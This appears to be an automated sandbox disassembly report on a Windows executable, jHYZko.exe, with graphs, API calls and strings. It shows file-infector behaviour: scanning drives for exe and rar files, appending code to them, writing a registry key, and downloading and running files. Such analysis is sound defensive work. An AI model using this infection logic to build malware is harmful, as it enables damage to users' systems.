1305->1321 1307 e61118 wsprintfA wsprintfA URLDownloadToFileA 1308 e610dc 1307->1308 1309 e61168 lstrlen Sleep 1307->1309 1312 e61000 CreateFileA 1308->1312 1309->1305 1313 e61025 GetFileSize CreateFileMappingA MapViewOfFile 1312->1313 1314 e61092 WinExec lstrlen 1312->1314 1315 e61057 1313->1315 1316 e6107b 1313->1316 1314->1304 1314->1305 1317 e61074 UnmapViewOfFile 1315->1317 1318 e61061 1315->1318 1319 e61087 CloseHandle 1316->1319 1320 e6108d CloseHandle 1316->1320 1317->1316 1318->1317 1319->1320 1320->1314 1321->1307 1335 e62361 1336 e62374 1335->1336 1337 e6236b UnmapViewOfFile 1335->1337 1338 e62382 1336->1338 1339 e62379 CloseHandle 1336->1339 1337->1336 1340 e62391 1338->1340 1341 e62388 CloseHandle 1338->1341 1339->1338 1341->1340 1323 e66159 1324 e6615f VirtualFree 1323->1324 1328 e660c7 1324->1328 1325 e66198 VirtualFree 1327 e661b2 1325->1327 1326 e660d5 VirtualAlloc 1326->1328 1329 e66389 VirtualProtect 1327->1329 1334 e662fb 1327->1334 1328->1324 1328->1325 1328->1326 1333 e663b7 1329->1333 1330 e663fc VirtualProtect 1331 e66418 1330->1331 1332 e663e7 VirtualProtect 1332->1330 1332->1333 1333->1330 1333->1332

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
                                  callgraph 0 Function_00E629E2 29 Function_00E628B8 0->29 1 Function_00E66B63 25 Function_00E667A4 1->25 26 Function_00E66834 1->26 28 Function_00E669B0 1->28 2 Function_00E62D60 3 Function_00E614E1 14 Function_00E61AF9 3->14 30 Function_00E61638 3->30 4 Function_00E62361 50 Function_00E62D9B 4->50 5 Function_00E61E6E 5->2 6 Function_00E61C68 5->6 8 Function_00E61DF6 5->8 5->14 22 Function_00E6185B 5->22 36 Function_00E61C81 5->36 41 Function_00E61D8A 5->41 42 Function_00E61B8A 5->42 44 Function_00E61915 5->44 5->50 7 Function_00E66076 18 Function_00E666C8 7->18 9 Function_00E66CF2 13 Function_00E66CF8 9->13 10 Function_00E61973 10->22 11 Function_00E62CF0 12 Function_00E62B7D 12->0 14->30 15 Function_00E62845 16 Function_00E6274A 15->16 45 Function_00E62692 15->45 48 Function_00E6239D 15->48 16->10 16->22 17 Function_00E62C48 17->10 40 Function_00E62B8C 17->40 31 Function_00E66A84 18->31 32 Function_00E66B02 18->32 34 Function_00E66D00 18->34 19 Function_00E617D0 20 Function_00E6605E 21 Function_00E6235D 23 Function_00E66159 23->18 24 Function_00E665A6 27 Function_00E66734 27->31 27->32 27->34 29->0 29->5 29->45 29->48 30->17 30->19 37 Function_00E61581 30->37 47 Function_00E6139F 30->47 51 Function_00E61718 30->51 52 Function_00E61099 30->52 31->9 39 Function_00E6680F 31->39 32->1 33 Function_00E61000 33->19 34->1 34->9 34->28 35 Function_00E66001 43 Function_00E6600A 35->43 37->22 38 Function_00E6120E 40->12 40->15 42->22 46 Function_00E6119F 47->38 47->46 53 Function_00E61319 47->53 48->0 48->44 49 Function_00E6189D 48->49 51->11 52->22 52->33

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 101 e629e2-e62a34 memset wsprintfA 102 e62abc-e62b21 memset * 2 FindFirstFileA call e628b8 memset 101->102 103 e62a3a-e62a86 memset lstrlen lstrcpyn strrchr 101->103 110 e62b61-e62b6b FindNextFileA 102->110 103->102 104 e62a88-e62a98 103->104 104->102 106 e62a9a-e62aa7 lstrcmpiA 104->106 108 e62b74-e62b7a 106->108 109 e62aad-e62aba lstrlen 106->109 109->102 109->106 111 e62b23-e62b2a 110->111 112 e62b6d-e62b6e FindClose 110->112 113 e62b4c-e62b5c call e628b8 111->113 114 e62b2c-e62b33 111->114 112->108 113->110 114->113 115 e62b35-e62b4a lstrcmpiA 114->115 115->112 115->113
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                  • String ID: %s*$C:\$Documents and Settings
                                  • API String ID: 2826467728-110786608
                                  • Opcode ID: 59923ebc7275c748c8ddc141bbb2e7f5817ad9e8a5fd326a57a8391541ba23ab
                                  • Instruction ID: 84181f78adf8ea2ebd3bcdabb89cd3354b7dde3c03c5ecfcc25e2819bdb6f94a
                                  • Opcode Fuzzy Hash: 59923ebc7275c748c8ddc141bbb2e7f5817ad9e8a5fd326a57a8391541ba23ab
                                  • Instruction Fuzzy Hash: 9C4172B2844749AFD720DBA0FC49DEBB7ECEB84395F04082DF644E2051E675D64C87A2

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 216 e61718-e61733 GetSystemTimeAsFileTime 217 e61754-e61758 216->217 218 e61735-e61752 SHSetValueA 216->218 219 e617c6-e617cd 217->219 220 e6175a-e61784 SHGetValueA 217->220 218->219 220->219 221 e61786-e617b3 call e62cf0 * 2 220->221 221->219 226 e617b5 221->226 227 e617b7-e617bd 226->227 228 e617bf 226->228 227->219 227->228 228->219
                                  APIs
                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\jHYZko.exe), ref: 00E61729
                                  • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00E6174C
                                  • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00E6177C
                                  • __aulldiv.LIBCMT ref: 00E61796
                                  • __aulldiv.LIBCMT ref: 00E617A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: TimeValue__aulldiv$FileSystem
                                  • String ID: C:\Users\user\AppData\Local\Temp\jHYZko.exe$SOFTWARE\GTplus$Time
                                  • API String ID: 541852442-809457920
                                  • Opcode ID: 672003f325ac7c3ab446ac1e60a15eb371401cd9fb71b29a2df3cf6ecafb0f05
                                  • Instruction ID: 3226136de9649f3d1b3bcc092a3a20f3f02f594df5c3327cf53ffb4c58d8d468
                                  • Opcode Fuzzy Hash: 672003f325ac7c3ab446ac1e60a15eb371401cd9fb71b29a2df3cf6ecafb0f05
                                  • Instruction Fuzzy Hash: 4211B975A80209BFDB119BA4EC85FFF7BBCEB01B94F109155F900B6140D7B09B448760

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 229 e66076-e66079 230 e660e0-e660eb 229->230 231 e6607b-e66080 229->231 232 e660ee-e660f4 230->232 233 e660f7-e660f8 231->233 234 e66082-e66085 231->234 235 e660f6 232->235 236 e660fe-e66106 233->236 237 e660fa-e660fc call e666c8 233->237 234->235 238 e66087 234->238 235->233 240 e66155-e66189 VirtualFree 236->240 241 e66108-e6611d 236->241 237->236 238->232 242 e66089-e66095 238->242 247 e6618c-e66192 240->247 244 e6611f-e66121 241->244 245 e66097-e6609f 242->245 246 e660a1-e660aa 242->246 248 e66123 244->248 249 e66151-e66154 244->249 245->246 250 e660b0-e660c1 VirtualAlloc 246->250 251 e661ba-e661c8 246->251 252 e660c7-e660cf 247->252 253 e66198-e661b0 VirtualFree 247->253 248->249 256 e66125-e66128 248->256 249->240 250->252 254 e66243-e66251 251->254 255 e661ca-e661d7 251->255 252->247 263 e660d5-e660df VirtualAlloc 252->263 253->251 259 e661b2-e661b4 253->259 257 e66264-e6626f 254->257 258 e66253 254->258 260 e661dd-e661e0 255->260 261 e66134-e6613b 256->261 262 e6612a-e6612e 256->262 265 e66271-e66276 257->265 264 e66255-e66258 258->264 259->251 260->254 266 e661e2-e661f2 260->266 273 e66130-e66132 261->273 274 e6613d-e6614f 261->274 262->261 262->273 263->230 264->257 269 e6625a-e66262 264->269 270 e6627c-e66289 265->270 271 e66389-e663b1 VirtualProtect 265->271 272 e661f5-e661fe 266->272 269->264 288 e66292-e66298 270->288 289 e6628b 270->289 277 e663b7-e663ba 271->277 275 e66200-e66203 272->275 276 e6620c-e66219 272->276 273->244 274->244 281 e66205-e66208 275->281 282 e6621b-e66228 275->282 283 e66238-e6623f 276->283 278 e663fc-e66416 VirtualProtect 277->278 279 e663bc-e663c2 277->279 286 e66420-e66425 278->286 287 e66418-e6641d 278->287 279->279 284 e663c4 279->284 290 e6622a-e66236 281->290 291 e6620a 281->291 282->283 283->272 285 e66241 283->285 284->278 292 e663c6-e663cf 284->292 285->260 293 e662a2-e662ac 288->293 289->288 290->283 291->283 296 e663d4-e663d8 292->296 297 e663d1 292->297 294 e662b1-e662c8 293->294 295 e662ae 293->295 298 e66373-e66384 294->298 299 e662ce-e662d4 294->299 295->294 300 e663dd-e663e1 296->300 301 e663da 296->301 297->296 298->265 302 e662d6-e662d9 299->302 303 e662da-e662f1 299->303 304 e663e7-e663fa VirtualProtect 300->304 305 e663e3 300->305 301->300 302->303 307 e66365-e6636e 303->307 308 e662f3-e662f9 303->308 304->277 304->278 305->304 307->293 309 e66314-e66326 308->309 310 e662fb-e6630f 308->310 312 e6634c-e66360 309->312 313 e66328-e6634a 309->313 311 e66426-e664a9 310->311 322 e664ab-e664c0 311->322 323 e66519-e6651c 311->323 312->311 313->307 329 e66535-e66537 322->329 330 e664c2 322->330 324 e66583-e66587 323->324 325 e6651d-e6651e 323->325 327 e66588-e6658b 324->327 328 e66522-e66533 325->328 331 e665a1-e665a3 327->331 332 e6658d-e6658f 327->332 328->329 333 e6659a 329->333 334 e66539 329->334 335 e664c5-e664cd 330->335 336 e664f8 330->336 342 e66591-e66593 332->342 337 e6659b-e6659d 333->337 343 e665b4 334->343 344 e6653b-e66541 334->344 338 e66542-e66545 335->338 339 e664cf-e664d4 335->339 340 e6656c-e6656f 336->340 341 e664fa-e664fe 336->341 337->342 345 e6659f 337->345 346 e6654d-e66550 338->346 347 e664d6-e664d9 339->347 348 e66517-e66518 339->348 350 e66572 340->350 341->350 351 e66500 341->351 342->337 352 e66595 342->352 349 e665be-e665db 343->349 344->338 345->327 346->349 353 e66552-e66556 346->353 347->346 354 e664db-e664f5 347->354 348->323 355 e665dd-e665f6 349->355 356 e66573-e66576 350->356 351->328 357 e66502 351->357 352->333 358 e66578-e6657a 353->358 359 e66558-e66569 353->359 354->336 360 e665f7-e66608 355->360 356->358 357->356 361 e66504-e66513 357->361 358->355 362 e6657c 358->362 359->340 361->329 363 e66515 361->363 362->360 364 e6657e-e6657f 362->364 363->348 364->324
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 00E660BE
                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00E660DF
                                  • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00E66189
                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00E661A5
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: 349471f2a949da949aa5bc8eba18811362fdec757e69655e6c87d840fd64c1c1
                                  • Instruction ID: e06b7e04f18fc61772ac8c4696e3d2f7258380d52f66ad5b393e6472afd9da8b
                                  • Opcode Fuzzy Hash: 349471f2a949da949aa5bc8eba18811362fdec757e69655e6c87d840fd64c1c1
                                  • Instruction Fuzzy Hash: 781267B15987848FDB328F24DC55BEA3FB0FF12354F1815ADD88AAB2A3D674A900C751

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 365 e62b8c-e62bc6 memset GetLogicalDriveStringsA 366 e62bc8-e62bcc 365->366 367 e62c09-e62c28 WaitForMultipleObjects 365->367 368 e62bce-e62bd0 366->368 369 e62bfa-e62c07 lstrlen 366->369 370 e62c3c-e62c45 367->370 371 e62c2a-e62c3a CreateThread 367->371 368->369 372 e62bd2-e62bdc GetDriveTypeA 368->372 369->366 369->367 371->370 372->369 373 e62bde-e62be1 372->373 373->369 374 e62be3-e62bf6 CreateThread 373->374 374->369
                                  APIs
                                  • memset.MSVCRT ref: 00E62BA6
                                  • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00E62BB4
                                  • GetDriveTypeA.KERNEL32(?), ref: 00E62BD3
                                  • CreateThread.KERNEL32(00000000,00000000,00E62B7D,?,00000000,00000000), ref: 00E62BEE
                                  • lstrlen.KERNEL32(?), ref: 00E62BFB
                                  • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00E62C16
                                  • CreateThread.KERNEL32(00000000,00000000,00E62845,00000000,00000000,00000000), ref: 00E62C3A
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                  • String ID:
                                  • API String ID: 1073171358-0
                                  • Opcode ID: 2f361d957e9318370c6a27a63a9c956d3a9a92d7a12e6b3f4664c25767015ed7
                                  • Instruction ID: 3b9755006c39d8f749b4deabbe7d0ee3696db6ef71ddcdd084cfc6c34d1b6495
                                  • Opcode Fuzzy Hash: 2f361d957e9318370c6a27a63a9c956d3a9a92d7a12e6b3f4664c25767015ed7
                                  • Instruction Fuzzy Hash: 5C21D5B198065CAFE7209F65BC84DAF7B6DFB053C8B141129FA42B2151D7618D0ECF61

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 e61e6e-e61e95 call e62d60 3 e61e97 call e61d8a 0->3 4 e61e9c-e61eaa call e61df6 0->4 3->4 8 e62332 4->8 9 e61eb0-e61ed9 SetFileAttributesA CreateFileA 4->9 11 e62338-e6233b 8->11 9->8 10 e61edf-e61f28 call e61915 SetFilePointer CreateFileMappingA MapViewOfFile 9->10 10->8 18 e61f2e-e61f39 10->18 13 e62346-e62349 11->13 14 e6233d-e62340 UnmapViewOfFile 11->14 16 e62350-e62354 13->16 17 e6234b-e6234e FindCloseChangeNotification 13->17 14->13 19 e62356-e6235b CloseHandle 16->19 20 e62391-e6239a call e62d9b 16->20 17->16 18->8 21 e61f3f-e61f56 18->21 19->20 21->8 23 e61f5c-e61f64 21->23 23->8 25 e61f6a-e61f70 23->25 25->8 26 e61f76-e61f87 call e61c81 25->26 26->8 29 e61f8d-e61fa7 call e6185b call e61c81 26->29 29->8 34 e61fad-e61fb4 29->34 35 e61fb6-e61fc5 call e61af9 34->35 36 e62024-e62045 34->36 35->36 44 e61fc7-e61fd2 35->44 36->8 37 e6204b-e6204e 36->37 39 e62070-e620f4 call e61af9 * 2 call e61c68 * 2 memset * 2 37->39 40 e62050-e62053 37->40 62 e620f5-e620fe 39->62 42 e62056-e6205a 40->42 42->39 45 e6205c-e62061 42->45 44->8 47 e61fd8-e61fe7 44->47 45->8 48 e62067-e6206e 45->48 50 e61fef-e62006 call e61af9 47->50 51 e61fe9-e61fec 47->51 48->42 56 e62013-e6201e FlushViewOfFile 50->56 57 e62008-e6200e call e61c68 50->57 51->50 56->36 57->56 63 e62130-e62139 62->63 64 e62100-e62114 62->64 67 e6213c-e62142 63->67 65 e62116-e6212a 64->65 66 e6212d-e6212e 64->66 65->66 66->62 68 e62144-e62150 67->68 69 e6215c 67->69 70 e62157-e6215a 68->70 71 e62152-e62154 68->71 72 e6215f-e62162 69->72 70->67 71->70 73 e62164-e62171 72->73 74 e62181-e62184 72->74 77 e62177-e6217e 73->77 78 e6232a-e6232d 73->78 75 e62186 74->75 76 e6218d-e621ba call e61c68 74->76 75->76 81 e621d3-e6220b call e61c81 call e61c68 76->81 82 e621bc-e621d0 call e61c68 76->82 77->74 78->72 89 e6220d-e62218 call e61c68 81->89 90 e6221b-e6221e 81->90 82->81 89->90 91 e62226-e62328 memcpy UnmapViewOfFile CloseHandle call e61b8a call e6185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call e61915 FindCloseChangeNotification 90->91 92 e62220-e62223 90->92 91->11 92->91
                                  APIs
                                  • SetFileAttributesA.KERNEL32(?,00000080,?,00E632B0,00000164,00E62986,?), ref: 00E61EB9
                                  • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00E61ECD
                                  • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00E61EF3
                                  • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00E61F07
                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00E61F1D
                                  • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00E6201E
                                  • memset.MSVCRT ref: 00E620D8
                                  • memset.MSVCRT ref: 00E620EA
                                  • memcpy.MSVCRT ref: 00E6222D
                                  • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E62238
                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E6224A
                                  • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E622C6
                                  • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E622CB
                                  • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E622DD
                                  • WriteFile.KERNEL32(000000FF,00E64008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E622F7
                                  • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E6230D
                                  • FindCloseChangeNotification.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E62322
                                  • UnmapViewOfFile.KERNEL32(?,?,00E632B0,00000164,00E62986,?), ref: 00E62340
                                  • FindCloseChangeNotification.KERNEL32(?,?,00E632B0,00000164,00E62986,?), ref: 00E6234E
                                  • CloseHandle.KERNEL32(000000FF,?,00E632B0,00000164,00E62986,?), ref: 00E62359
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: File$CloseView$Pointer$ChangeCreateFindHandleNotificationUnmapWritememset$AttributesFlushMappingmemcpy
                                  • String ID: .@$5@$<@$C@$m@
                                  • API String ID: 3349749541-519767493
                                  • Opcode ID: d26c098e803e7ece1a4ce2e7a682276fb857847bf961b11d43c5fc5a192dc92c
                                  • Instruction ID: ff1b3084269da71dc5a2489492cf1ad86331fa2b46fdeb6139170e5b1de2ad07
                                  • Opcode Fuzzy Hash: d26c098e803e7ece1a4ce2e7a682276fb857847bf961b11d43c5fc5a192dc92c
                                  • Instruction Fuzzy Hash: BAF16A70980609EFCB25DFA4EC80AADBBB5FF08394F109569E609B76A1D730AD45CF50

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 117 e61973-e6199a PathFileExistsA 118 e61ac7-e61acc 117->118 119 e619a0-e619aa 117->119 121 e61ad0-e61ad5 118->121 122 e61ace 118->122 120 e619af-e619c2 CreateFileA 119->120 123 e619c4-e619d3 Sleep 120->123 124 e61a28-e61a36 GetFileSize 120->124 125 e61ad7-e61ad9 121->125 126 e61af0-e61af6 121->126 122->121 123->120 127 e619d5-e61a0b call e6185b wsprintfA CopyFileA 123->127 128 e61a87-e61a8b 124->128 129 e61a38-e61a3b 124->129 125->126 127->124 141 e61a0d-e61a26 CreateFileA 127->141 130 e61a96-e61a9a 128->130 131 e61a8d-e61a90 FindCloseChangeNotification 128->131 129->128 133 e61a3d-e61a51 VirtualAlloc 129->133 134 e61a9c 130->134 135 e61aad-e61ab1 130->135 131->130 133->128 137 e61a53-e61a57 133->137 138 e61aa0-e61aa7 DeleteFileA 134->138 139 e61ab3-e61ab6 135->139 140 e61adb-e61ae0 135->140 142 e61a80 137->142 143 e61a59-e61a6d ReadFile 137->143 138->135 139->118 144 e61ab8-e61ac1 VirtualFree 139->144 146 e61ae7-e61aec 140->146 147 e61ae2-e61ae5 140->147 141->124 145 e61a9e 141->145 142->128 143->128 148 e61a6f-e61a7e 143->148 144->118 145->138 146->126 149 e61aee 146->149 147->146 148->142 148->143 149->126
                                  APIs
                                  • PathFileExistsA.SHLWAPI(\N,00000000,C:\Users\user\AppData\Local\Temp\jHYZko.exe), ref: 00E61992
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00E619BA
                                  • Sleep.KERNEL32(00000064), ref: 00E619C6
                                  • wsprintfA.USER32 ref: 00E619EC
                                  • CopyFileA.KERNEL32(?,?,00000000), ref: 00E61A00
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E61A1E
                                  • GetFileSize.KERNEL32(?,00000000), ref: 00E61A2C
                                  • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00E61A46
                                  • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E61A65
                                  • FindCloseChangeNotification.KERNEL32(000000FF), ref: 00E61A90
                                  • DeleteFileA.KERNEL32(?), ref: 00E61AA7
                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E61AC1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                                  • String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\jHYZko.exe$\N
                                  • API String ID: 2523042076-1649785553
                                  • Opcode ID: c6324214c5610a4057a63c603f0e838318a55384345db738b0d02f89dffb5423
                                  • Instruction ID: 4020746156f4bf18533b1cedcfc5f7b49affe4a277251eaf1986a65ffd3d2fe1
                                  • Opcode Fuzzy Hash: c6324214c5610a4057a63c603f0e838318a55384345db738b0d02f89dffb5423
                                  • Instruction Fuzzy Hash: C3518E71D41219EFCB119FE9EC84AAEBBB8FB05398F1855A9F515F2190C3708E44CB50

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 150 e628b8-e628ff memset wsprintfA 151 e62905-e6290d 150->151 152 e629db-e629df 150->152 151->152 153 e62913-e62919 151->153 154 e62956-e62965 strrchr 153->154 155 e6291b-e6294c memset wsprintfA call e629e2 153->155 154->152 157 e62967-e62978 lstrcmpiA 154->157 158 e62951 155->158 159 e6297a-e62981 call e61e6e 157->159 160 e62988-e62992 lstrcmpiA 157->160 158->152 163 e62986 159->163 160->152 161 e62994-e6299b 160->161 164 e629ad-e629c9 strstr 161->164 165 e6299d-e629a3 161->165 163->152 167 e629d3-e629d6 call e62692 164->167 168 e629cb-e629d1 call e6239d 164->168 165->164 166 e629a5-e629a7 lstrcpy 165->166 166->164 167->152 168->152
                                  APIs
                                  • memset.MSVCRT ref: 00E628D3
                                  • wsprintfA.USER32 ref: 00E628F7
                                  • memset.MSVCRT ref: 00E62925
                                  • wsprintfA.USER32 ref: 00E62940
                                    • Part of subcall function 00E629E2: memset.MSVCRT ref: 00E62A02
                                    • Part of subcall function 00E629E2: wsprintfA.USER32 ref: 00E62A1A
                                    • Part of subcall function 00E629E2: memset.MSVCRT ref: 00E62A44
                                    • Part of subcall function 00E629E2: lstrlen.KERNEL32(?), ref: 00E62A54
                                    • Part of subcall function 00E629E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00E62A6C
                                    • Part of subcall function 00E629E2: strrchr.MSVCRT ref: 00E62A7C
                                    • Part of subcall function 00E629E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00E62A9F
                                    • Part of subcall function 00E629E2: lstrlen.KERNEL32(Documents and Settings), ref: 00E62AAE
                                    • Part of subcall function 00E629E2: memset.MSVCRT ref: 00E62AC6
                                    • Part of subcall function 00E629E2: memset.MSVCRT ref: 00E62ADA
                                    • Part of subcall function 00E629E2: FindFirstFileA.KERNEL32(?,?), ref: 00E62AEF
                                    • Part of subcall function 00E629E2: memset.MSVCRT ref: 00E62B13
                                  • strrchr.MSVCRT ref: 00E62959
                                  • lstrcmpiA.KERNEL32(00000001,exe), ref: 00E62974
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd
                                  Similarity
                                  • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                  • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                                  • API String ID: 3004273771-898104377
                                  • Opcode ID: e42814b04b87444f0fe0b30faa924fa911cbf8619e182018c83bbd100ab77518
                                  • Instruction ID: e89f1e9e15af861090f836307b23d35bb68fb86cd7a6633633f2ea3ff0fd7e3a
                                  • Opcode Fuzzy Hash: e42814b04b87444f0fe0b30faa924fa911cbf8619e182018c83bbd100ab77518
                                  • Instruction Fuzzy Hash: 8531C77198070D7BDB219775FC85FCA77AC9F903D4F04185AF645B2181E6B4DAC88BA0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
